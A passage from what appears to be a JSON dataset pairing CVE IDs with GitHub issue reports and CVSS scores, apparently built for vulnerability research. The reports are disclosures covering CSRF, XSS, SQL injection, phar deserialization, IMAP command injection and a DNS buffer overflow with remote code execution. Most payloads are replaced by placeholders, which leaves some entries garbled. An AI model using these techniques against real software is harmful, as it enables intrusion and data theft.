  33171. "description": "APITAG bypass in archive plugin. As explained in my last comment on NUMBERTAG which I'm going to quote): > in APITAG \"_uids\" it's taken via POST so it seems that you cannot exploit this since you'll end with APITAG checking for a token. But it's not like this. In APITAG there's a call to APITAG which get \"_uids\" again BUT with INPUT_GPC. So after line NUMBERTAG our _uids passed from GET it's injected. This by passes check_request: cause a request to APITAG it's considered a post, with empty $_POST. Which means that in versions previous to the APITAG first check for ajax requests this it's exploitable by just tricking the victim with clicking and/or a simple html page. Posterior version may be more difficult to exploit due to same origin policy. I tested this on roundcube NUMBERTAG and a simple APITAG works flawless. On more recent versions like NUMBERTAG SOP kick in but if it's somehow respected or bypassed then the same exploit works (will return a File not Found template, nonetheless code'll be executed).",
  33172. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33173. "severity": "HIGH",
  33174. "baseScore": 8.8,
  33175. "impactScore": 5.9,
  33176. "exploitabilityScore": 2.8
  33177. },
  33178. {
  33179. "CVE_ID": "CVE-2018-9846",
  33180. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6229",
  33181. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6229",
  33182. "Repo_new": "roundcube/roundcubemail",
  33183. "Issue_Created_At": "2018-03-28T04:09:10Z",
  33184. "description": "MX injection and type juggling vulnerabilities. Hello, I'm here to report two vulnerabilities I have found while doing research on Roundcube NUMBERTAG which are also present in your last release FILETAG . This two bugs are not exploitable in the wild, at least to my current knowledge; nonetheless fixing them should be a priority of yours because they could be chained with other minor stuff and then become exploitable in a realistic, attacker pov efficient way. Plus, with the ongoing grow of this project you may introduce features that could be used to leverage this stuff. Since the bugs are not so easy to spot, especially the mx injection, I'll now try to explain myself in the clearest way possible, the code I'll refer to it's the NUMBERTAG I'll conclude with a brief summary. MX Injection On function APITAG we have: APITAG A little bit of context: rcmail::get_uids inside the foreach cycle it's responsible to get $mbox from $uids which is passed via POST (line NUMBERTAG but anyway passing them by GET will work too); if provided with a format like ID MBOX it will split the thing and have $uids =array(ID) and $mbox =\"MBOX\"; Fine. The first IF and ELSE IF (line NUMBERTAG and NUMBERTAG set our prerequisite to exploit the bug: the archive folder has to be set, and the archive_type must be set and be different from \"folder\" that's because the function APITAG (line NUMBERTAG do his job right: will call APITAG which will call APITAG which will call APITAG which sanitize $uids. The problem lies in that else branch FILETAG line NUMBERTAG line NUMBERTAG APITAG calls fetch_headers($mbox, $uids); line NUMBERTAG APITAG calls APITAG where $folder is $mbox and $msgs is $uids line NUMBERTAG APITAG calls fetch($mailbox, $message_set, $is_uid, $query_items); APITAG it's a core function used everywhere for doing is job: fetching things. APITAG On line NUMBERTAG mailbox it's checked and the function returns false, so the attacker can't exploit that but, no check are done on $message_set which, still, is our user controlled input which will end in line NUMBERTAG the command to the MX server causing an MX injection. PHP Type Juggling This is far more easy to spot and straightforward, few words: on APITAG we have APITAG as you can see every check it's performed just with the == operator which is a loose not strict operator. This is not exploitable right now, and it's just a theorical bug, because you just use HTTP Paramaters which are strings, not typed but if you'll introduce JSON then this will become easily exploitable and will cause a CSRF bypass. APITAG Nonetheless as I said in my introduction you should fix this: what if I opened a \"JSON for post parameters\" request as a feature request? I hope I made myself enough clear, if you need more explanation: I am willing to help. When you fix this I'd like to write and publish a technical blog post about my findings ( the mx injection it's quite hided and nice, I think) if that's okay with you. PS: I think this issue should be private, not familiar with github if that's possible maybe we should do that.",
  33185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33186. "severity": "HIGH",
  33187. "baseScore": 8.8,
  33188. "impactScore": 5.9,
  33189. "exploitabilityScore": 2.8
  33190. },
  33191. {
  33192. "CVE_ID": "CVE-2018-9856",
  33193. "Issue_Url_old": "https://github.com/Kotti/Kotti/issues/551",
  33194. "Issue_Url_new": "https://github.com/kotti/kotti/issues/551",
  33195. "Repo_new": "kotti/kotti",
  33196. "Issue_Created_At": "2018-03-27T09:19:53Z",
  33197. "description": "APITAG Site Request Forgery) in Kotti. There is a APITAG Site Request Forgery) security vulnerablity in Kotti when you assign global roles. Detail If admin is an Adiministration with full permissions, and testuser is a common user with viewer permission, admin document is the document created by admin , when admin click the APITAG as bellow, testuser will be the owner of the admin document ( testuser has full permission of admin document ). APITAG CODETAG Advice: Add an anti CSRF token in the form when generate the form, and check the token in the view function. Tested in the Kotti NUMBERTAG but Kotti NUMBERTAG is also Vulnerable. Disclosuered By phoenix. EMAILTAG .cn",
  33198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33199. "severity": "HIGH",
  33200. "baseScore": 8.8,
  33201. "impactScore": 5.9,
  33202. "exploitabilityScore": 2.8
  33203. },
  33204. {
  33205. "CVE_ID": "CVE-2018-9922",
  33206. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/16",
  33207. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/16",
  33208. "Repo_new": "idreamsoft/iCMS",
  33209. "Issue_Created_At": "2018-03-25T12:34:08Z",
  33210. "description": "Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry. Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry and can view the root path by constructing paylod\u3002 Paylod\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG X Requested With: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Connection: close APITAG APITAG APITAG FILETAG",
  33211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33212. "severity": "MEDIUM",
  33213. "baseScore": 5.3,
  33214. "impactScore": 1.4,
  33215. "exploitabilityScore": 3.9
  33216. },
  33217. {
  33218. "CVE_ID": "CVE-2018-9923",
  33219. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/17",
  33220. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/17",
  33221. "Repo_new": "idreamsoft/iCMS",
  33222. "Issue_Created_At": "2018-03-25T12:35:46Z",
  33223. "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG article add. CSRF exists in the idreamsoft iCMS NUMBERTAG article add and can be add\u00a0 the article by constructing paylod\u3002 Paylod\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  33224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33225. "severity": "HIGH",
  33226. "baseScore": 8.8,
  33227. "impactScore": 5.9,
  33228. "exploitabilityScore": 2.8
  33229. },
  33230. {
  33231. "CVE_ID": "CVE-2018-9924",
  33232. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/19",
  33233. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/19",
  33234. "Repo_new": "idreamsoft/iCMS",
  33235. "Issue_Created_At": "2018-03-25T12:39:46Z",
  33236. "description": "SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add. SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add\u3002 POST injection\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG FILETAG FILETAG",
  33237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33238. "severity": "CRITICAL",
  33239. "baseScore": 9.8,
  33240. "impactScore": 5.9,
  33241. "exploitabilityScore": 3.9
  33242. },
  33243. {
  33244. "CVE_ID": "CVE-2018-9925",
  33245. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/18",
  33246. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/18",
  33247. "Repo_new": "idreamsoft/iCMS",
  33248. "Issue_Created_At": "2018-03-25T12:37:12Z",
  33249. "description": "XSS exists in the idreamsoft ICMS NUMBERTAG user nickname. XSS exists in the idreamsoft ICMS NUMBERTAG user nickname and can be executed by setting up the paylod execution script\u3002 Paylod\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG NUMBERTAG APITAG NUMBERTAG APITAG FILETAG FILETAG",
  33250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  33251. "severity": "MEDIUM",
  33252. "baseScore": 5.4,
  33253. "impactScore": 2.7,
  33254. "exploitabilityScore": 2.3
  33255. },
  33256. {
  33257. "CVE_ID": "CVE-2018-9926",
  33258. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/128",
  33259. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/128",
  33260. "Repo_new": "wuzhicms/wuzhicms",
  33261. "Issue_Created_At": "2018-04-08T09:47:23Z",
  33262. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a FILETAG ERRORTAG FILETAG ERRORTAG",
  33263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33264. "severity": "HIGH",
  33265. "baseScore": 8.8,
  33266. "impactScore": 5.9,
  33267. "exploitabilityScore": 2.8
  33268. },
  33269. {
  33270. "CVE_ID": "CVE-2018-9985",
  33271. "Issue_Url_old": "https://github.com/learnsec6/test/issues/1",
  33272. "Issue_Url_new": "https://github.com/learnsec6/test/issues/1",
  33273. "Repo_new": "learnsec6/test",
  33274. "Issue_Created_At": "2018-04-10T16:07:15Z",
  33275. "description": "metinfo NUMBERTAG SS Vulnerability. There is a XSS Vulnerability on front page can attack administrator POC: First download the metinfo the Latest version from URLTAG FILETAG second: inject xss from in feedback page,and then submit to the administrator FILETAG last: when the administrator login in the webseit and Check the feedback message,the xss will be touched off. FILETAG",
  33276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33277. "severity": "MEDIUM",
  33278. "baseScore": 6.1,
  33279. "impactScore": 2.7,
  33280. "exploitabilityScore": 2.8
  33281. },
  33282. {
  33283. "CVE_ID": "CVE-2019-1000001",
  33284. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2495",
  33285. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2495",
  33286. "Repo_new": "nilsteampassnet/teampass",
  33287. "Issue_Created_At": "2018-12-07T16:17:54Z",
  33288. "description": "Shared password security questions.. Hello, For shared password, if I understand well, the key used to encrypt passwords is splitted between an part of a key in a file and the other part stored in the database, I'm I correct\u00a0? I'm I correct if I says that a user password is not used to encrypt / decrypt shared password ? If so, if I gain access to the teampass interface bypassing the authentication, I can see the shared secret of a user without needing his password for decyphering purpose ? Other Question but related : Is it safe to backup on the same server the database (dump) and the teampass files ? If someone gain access to my server with both the webserver and the database, we he be able to decypher all the shared password of the database ?",
  33289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33290. "severity": "CRITICAL",
  33291. "baseScore": 9.8,
  33292. "impactScore": 5.9,
  33293. "exploitabilityScore": 3.9
  33294. },
  33295. {
  33296. "CVE_ID": "CVE-2019-1000004",
  33297. "Issue_Url_old": "https://github.com/yugandhargangu/JspMyAdmin2/issues/22",
  33298. "Issue_Url_new": "https://github.com/yugandhargangu/jspmyadmin2/issues/22",
  33299. "Repo_new": "yugandhargangu/jspmyadmin2",
  33300. "Issue_Created_At": "2018-03-08T13:06:19Z",
  33301. "description": "Stored XSS in sidebar and in table_data. The sidebar and table_data are vulnerable to Stored XSS, which means an attacker could store HTML code on the database that would be rendered by the browser when viewed and potentially run malicious code. This can be fixed in the APITAG function of the APITAG and in the APITAG function of the APITAG using APITAG function on the data coming from the database.",
  33302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33303. "severity": "MEDIUM",
  33304. "baseScore": 6.1,
  33305. "impactScore": 2.7,
  33306. "exploitabilityScore": 2.8
  33307. },
  33308. {
  33309. "CVE_ID": "CVE-2019-1000005",
  33310. "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/949",
  33311. "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/949",
  33312. "Repo_new": "mpdf/mpdf",
  33313. "Issue_Created_At": "2019-01-08T15:01:04Z",
  33314. "description": "Insecure PHP deserialization through phar:// wrapper.. Hello, During bug bounty hunting I met one of the old version of yours library and decided to test it for known vulnerabilities, namely PHP deserialization through _phar://_ wrapper that was discovered independently by MENTIONTAG and MENTIONTAG FILETAG FILETAG CTF challenge by Orange Tsai URLTAG So, after some tests, looks like yours library has similar issue as TCPDF URLTAG library. Method APITAG of APITAG class pass value of _src_ attribute of _img_ tag to APITAG function, what can lead to PHP deserialization if value contains _phar://_ wrapper. URLTAG For proof of concept I create class with APITAG method (based on APITAG deserialization chain) and use phpggc URLTAG library to create image, which contains phar metadata. Phpggc repo also provide dozens of popular deserialization chains for popular frameworks and libraries. Source code of test class: ERRORTAG Source code of trigger script: CODETAG Video Proof Of Concept URLTAG Tested on version NUMBERTAG and NUMBERTAG latest). PHP NUMBERTAG TCPDF CVE: URLTAG TCPDF fix commit that disallow pass pathes with _phar://_ wrapper: URLTAG",
  33315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33316. "severity": "HIGH",
  33317. "baseScore": 8.8,
  33318. "impactScore": 5.9,
  33319. "exploitabilityScore": 2.8
  33320. },
  33321. {
  33322. "CVE_ID": "CVE-2019-1000006",
  33323. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/10739",
  33324. "Issue_Url_new": "https://github.com/riot-os/riot/issues/10739",
  33325. "Repo_new": "riot-os/riot",
  33326. "Issue_Created_At": "2019-01-09T16:12:15Z",
  33327. "description": "gnrc_sock_dns: Security issues (including remote code execution). Description APITAG doesn't perform sufficient sanity checks on the DNS response it receives from the configured DNS server. Here is a non exhaustive list of issues NUMBERTAG The QDCOUNT contained in the DNS response is not verified. This causes an out of bounds buffer access in the APITAG function if QDCOUNT is set to a value larger than the buf len supplied to APITAG NUMBERTAG The RDLENGTH bounds check for the answer section is incorrect for two reasons: (a) APITAG is the first invalid address, so APITAG needs to be used as a comparison operator (b) The result of APITAG might cause a pointer overflow (especially due to the fact that addrlen is attacker controlled). If pointer overflows wrap around (undefined behaviour) this would allow an attacker to circumvent the bounds check and exposes a buffer overflow vulnerability since the attacker controlled addrlen is later used in APITAG , potentially allowing a code execution NUMBERTAG The size of the caller allocated buffer APITAG is not passed to the APITAG function at all. This makes checking whether the attacker controlled address actually fits in the buffer impossible and allows an easy buffer overflow and potential code execution. All of these are especially critical due to the fact that DNS responses can easily be spoofed, especially since all spoofing protection mechanisms of DNS were not implemented. So an attacker doesn't even need to control the configured DNS server in order to exploit this. Steps to reproduce the issue NUMBERTAG Flash an unmodified version of APITAG to your RIOT node NUMBERTAG Adjust your APITAG on your border router and add a RDNSS definition. Causing a crash Constantly send a DNS response with an excessive qdcount on the computer associated with the IP Address you configured in the radvd RDNSS definition. For example CODETAG Remote code execution This is (obviously) highly platform specific. We did this with APITAG . We wrote some ARM assembler code which toggles the LED and stored the machine code for it in the RDATA field of the answer section in the DNS response, thereby overflowing the addr buffer in the main stack frame. Our payload exactly fits into the stack frame of the main function and overwrites the return address of that function, jumping to the addr buffer and executing our payload. Exploit written by MENTIONTAG See: URLTAG We also working on documenting how to adapt the payload for slightly different binaries (depending on toolchain, board, \u2026 the exploit might not work because of hardcoded memory addresses). Versions RIOT Version NUMBERTAG e NUMBERTAG f NUMBERTAG ERRORTAG NUMBERTAG eb NUMBERTAG c NUMBERTAG b5e NUMBERTAG c NUMBERTAG Build environment: ERRORTAG",
  33328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33329. "severity": "CRITICAL",
  33330. "baseScore": 9.8,
  33331. "impactScore": 5.9,
  33332. "exploitabilityScore": 3.9
  33333. },
  33334. {
  33335. "CVE_ID": "CVE-2019-1000010",
  33336. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2327",
  33337. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2327",
  33338. "Repo_new": "phpipam/phpipam",
  33339. "Issue_Created_At": "2018-11-21T23:17:40Z",
  33340. "description": "XSS via FILETAG & subnet scan APITAG The line APITAG in PATHTAG and no CSRF protection at PATHTAG causes an XSS vulnerability. Poc: CODETAG Note that a valid APITAG has to be used.",
  33341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33342. "severity": "MEDIUM",
  33343. "baseScore": 6.1,
  33344. "impactScore": 2.7,
  33345. "exploitabilityScore": 2.8
  33346. },
  33347. {
  33348. "CVE_ID": "CVE-2019-1000011",
  33349. "Issue_Url_old": "https://github.com/api-platform/core/issues/2364",
  33350. "Issue_Url_new": "https://github.com/api-platform/core/issues/2364",
  33351. "Repo_new": "api-platform/core",
  33352. "Issue_Created_At": "2018-12-04T13:37:55Z",
  33353. "description": "Graphql problem with delete mutation. Hello, I have permission problem with delete mutation. APITAG This query is valid and the book will be deleted . If I have permission to delete office , I can delete another entity. I think need check APITAG and class APITAG there URLTAG APITAG P.S. Thank you for your work. P.S.S. Sorry for my English )",
  33354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  33355. "severity": "MEDIUM",
  33356. "baseScore": 6.5,
  33357. "impactScore": 3.6,
  33358. "exploitabilityScore": 2.8
  33359. },
  33360. {
  33361. "CVE_ID": "CVE-2019-1000022",
  33362. "Issue_Url_old": "https://github.com/ptaoussanis/sente/issues/137",
  33363. "Issue_Url_new": "https://github.com/ptaoussanis/sente/issues/137",
  33364. "Repo_new": "ptaoussanis/sente",
  33365. "Issue_Created_At": "2015-06-14T21:33:02Z",
  33366. "description": "Securing cross origin requests. From URLTAG if somebody wasn't using CSRF tokens, it seems like it would be possible for any malicious website to open up a web socket to do Bad Things. I know that CSRF tokens are highly recommended, but they're not suitable for all cases (I think). It could be good to also add CORS style protection to Sente to allow only whitelisted origins. What are your thoughts? N.B. CORS itself has no influence on websocket connections.",
  33367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33368. "severity": "HIGH",
  33369. "baseScore": 8.8,
  33370. "impactScore": 5.9,
  33371. "exploitabilityScore": 2.8
  33372. },
  33373. {
  33374. "CVE_ID": "CVE-2019-10010",
  33375. "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/353",
  33376. "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/353",
  33377. "Repo_new": "thephpleague/commonmark",
  33378. "Issue_Created_At": "2019-03-21T21:56:59Z",
  33379. "description": "XSS Vulnerability. An XSS vulnerability has been identified in all versions of this library prior to NUMBERTAG unreleased). We will be releasing NUMBERTAG shortly to resolve this issue. This announcement will be updated with additional information once the fix has been released.",
  33380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33381. "severity": "MEDIUM",
  33382. "baseScore": 6.1,
  33383. "impactScore": 2.7,
  33384. "exploitabilityScore": 2.8
  33385. },
  33386. {
  33387. "CVE_ID": "CVE-2019-10015",
  33388. "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/12",
  33389. "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/12",
  33390. "Repo_new": "baigostudio/baigosso",
  33391. "Issue_Created_At": "2019-03-07T02:41:00Z",
  33392. "description": "There is a Code Injection vulnerability. There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG FILETAG The content of APITAG are: FILETAG FILETAG",
  33393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  33394. "severity": "HIGH",
  33395. "baseScore": 7.2,
  33396. "impactScore": 5.9,
  33397. "exploitabilityScore": 1.2
  33398. },
  33399. {
  33400. "CVE_ID": "CVE-2019-1002100",
  33401. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/74534",
  33402. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/74534",
  33403. "Repo_new": "kubernetes/kubernetes",
  33404. "Issue_Created_At": "2019-02-25T19:39:09Z",
  33405. "description": "Placeholder. Placeholder",
  33406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  33407. "severity": "MEDIUM",
  33408. "baseScore": 6.5,
  33409. "impactScore": 3.6,
  33410. "exploitabilityScore": 2.8
  33411. },
  33412. {
  33413. "CVE_ID": "CVE-2019-10063",
  33414. "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/2782",
  33415. "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/2782",
  33416. "Repo_new": "flatpak/flatpak",
  33417. "Issue_Created_At": "2019-03-25T10:08:54Z",
  33418. "description": "might be vulnerable to an attack similar to CVETAG . On APITAG , MENTIONTAG wrote: > Snap just had a vulnerability where the TIOCSTI seccomp filter could be circumvented. > URLTAG > > Is bubblewrap also affected by this? bubblewrap isn't directly affected, because it doesn't try to prevent TIOCSTI, but things like Flatpak that use bubblewrap might well be vulnerable to a very similar attack. From the snapd advisory, USN NUMBERTAG The snapd default seccomp filter for strict mode snaps blocks the use of the APITAG system call when used with TIOCSTI as the second argument to the system call. Jann Horn discovered that this restriction could be circumvented on NUMBERTAG bit architectures. A malicious snap could exploit this to bypass intended access restrictions to insert characters into the terminal\u2019s input queue. and from comments at the beginning of the snapd exploit: > This bytecode performs a NUMBERTAG bit comparison; however, the syscall entry point for APITAG is defined with a NUMBERTAG bit command argument in the kernel: > > ERRORTAG > > This means that setting a bit in the high half of the command parameter will circumvent the seccomp filter while being ignored by the kernel. If Flatpak is vulnerable, it will need its own CVE ID, because CVETAG is for the snapd codebase.",
  33419. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  33420. "severity": "CRITICAL",
  33421. "baseScore": 9.0,
  33422. "impactScore": 6.0,
  33423. "exploitabilityScore": 2.2
  33424. },
  33425. {
  33426. "CVE_ID": "CVE-2019-1010003",
  33427. "Issue_Url_old": "https://github.com/leanote/leanote/issues/719",
  33428. "Issue_Url_new": "https://github.com/leanote/leanote/issues/719",
  33429. "Repo_new": "leanote/leanote",
  33430. "Issue_Created_At": "2018-01-03T12:01:28Z",
  33431. "description": "XSS in blog post. You can trigger an XSS creating a markdown note with the following payload: ERRORTAG Converting it to a blogpost and opening the link will trigger the XSS",
  33432. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33433. "severity": "MEDIUM",
  33434. "baseScore": 6.1,
  33435. "impactScore": 2.7,
  33436. "exploitabilityScore": 2.8
  33437. },
  33438. {
  33439. "CVE_ID": "CVE-2019-1010005",
  33440. "Issue_Url_old": "https://github.com/Moeditor/Moeditor/issues/156",
  33441. "Issue_Url_new": "https://github.com/moeditor/moeditor/issues/156",
  33442. "Repo_new": "moeditor/moeditor",
  33443. "Issue_Created_At": "2017-12-05T09:06:42Z",
  33444. "description": "XSS to Code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
  33445. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33446. "severity": "MEDIUM",
  33447. "baseScore": 6.1,
  33448. "impactScore": 2.7,
  33449. "exploitabilityScore": 2.8
  33450. },
  33451. {
  33452. "CVE_ID": "CVE-2019-1010005",
  33453. "Issue_Url_old": "https://github.com/zhuzhuyule/HexoEditor/issues/3",
  33454. "Issue_Url_new": "https://github.com/zhuzhuyule/hexoeditor/issues/3",
  33455. "Repo_new": "zhuzhuyule/hexoeditor",
  33456. "Issue_Created_At": "2018-01-03T13:28:12Z",
  33457. "description": "XSS to code execution vulnerability. As this project has inherited the Moeditor based on the information received here: URLTAG I would like to report XSS to code execution vulnerability in APITAG version NUMBERTAG Please do contact me at EMAILTAG for the poc.",
  33458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33459. "severity": "MEDIUM",
  33460. "baseScore": 6.1,
  33461. "impactScore": 2.7,
  33462. "exploitabilityScore": 2.8
  33463. },
  33464. {
  33465. "CVE_ID": "CVE-2019-1010008",
  33466. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/763",
  33467. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/763",
  33468. "Repo_new": "emoncms/emoncms",
  33469. "Issue_Created_At": "2017-12-29T13:08:30Z",
  33470. "description": "Possible XSS in \"My Account\". Hello, it is more a beauty mistake than really harmful, but when logged in as any user, APITAG code can be executed through APITAG APITAG APITAG and APITAG Page\" fields in the My Account page (see appended picture). Still the input should be sanitized. It is already prevented by APITAG of the input in FILETAG . Regards, jna NUMBERTAG FILETAG",
  33471. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  33472. "severity": "MEDIUM",
  33473. "baseScore": 5.4,
  33474. "impactScore": 2.7,
  33475. "exploitabilityScore": 2.3
  33476. },
  33477. {
  33478. "CVE_ID": "CVE-2019-1010016",
  33479. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7962",
  33480. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7962",
  33481. "Repo_new": "dolibarr/dolibarr",
  33482. "Issue_Created_At": "2017-12-14T20:21:19Z",
  33483. "description": "Multiple XSS. Hello, Several reflected XSS can be found in version NUMBERTAG This is because the id parameter does not get properly validated to be an integer when called like this: APITAG ` Therefore php code like APITAG Will lead to reflected xss as it can be seen here: APITAG ... and many other scripts. Cheers",
  33484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33485. "severity": "MEDIUM",
  33486. "baseScore": 6.1,
  33487. "impactScore": 2.7,
  33488. "exploitabilityScore": 2.8
  33489. },
  33490. {
  33491. "CVE_ID": "CVE-2019-1010017",
  33492. "Issue_Url_old": "https://github.com/savon-noir/python-libnmap/issues/87",
  33493. "Issue_Url_new": "https://github.com/savon-noir/python-libnmap/issues/87",
  33494. "Repo_new": "savon-noir/python-libnmap",
  33495. "Issue_Created_At": "2018-02-01T04:25:53Z",
  33496. "description": "XML Injection APITAG attack. Issue Libnmap is vulnerable to XML Bomb attacks using the following: URLTAG Where the Issue Occurred The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below: URLTAG Reproduction steps Run the following code: CODETAG Remediation Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.",
  33497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33498. "severity": "HIGH",
  33499. "baseScore": 7.5,
  33500. "impactScore": 3.6,
  33501. "exploitabilityScore": 3.9
  33502. },
  33503. {
  33504. "CVE_ID": "CVE-2019-1010039",
  33505. "Issue_Url_old": "https://github.com/AKuHAK/uLaunchELF/issues/14",
  33506. "Issue_Url_new": "https://github.com/ps2homebrew/wlaunchelf/issues/14",
  33507. "Repo_new": "ps2homebrew/wlaunchelf",
  33508. "Issue_Created_At": "2018-03-02T03:07:08Z",
  33509. "description": "Buffer overflow in loader.c. There is a buffer overflow vulnerability in the loader.c file. This is in regards to both the s variable and the partition variable. The partition variable contains APITAG which is user controlled as displayed below: URLTAG This variable has a size of NUMBERTAG characters, making it simple to overflow: URLTAG Running with APITAG NUMBERTAG A's) will make the application crash. This weakness may be used to change the intended execution flow of the program.",
  33510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33511. "severity": "CRITICAL",
  33512. "baseScore": 9.8,
  33513. "impactScore": 5.9,
  33514. "exploitabilityScore": 3.9
  33515. },
  33516. {
